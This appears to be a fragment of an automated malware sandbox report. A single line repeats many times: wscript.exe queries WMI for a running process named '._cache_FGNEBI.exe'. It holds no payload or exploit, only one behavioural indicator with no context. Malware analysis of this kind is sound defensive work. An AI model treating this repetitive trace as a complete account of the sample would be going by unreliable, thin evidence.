                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
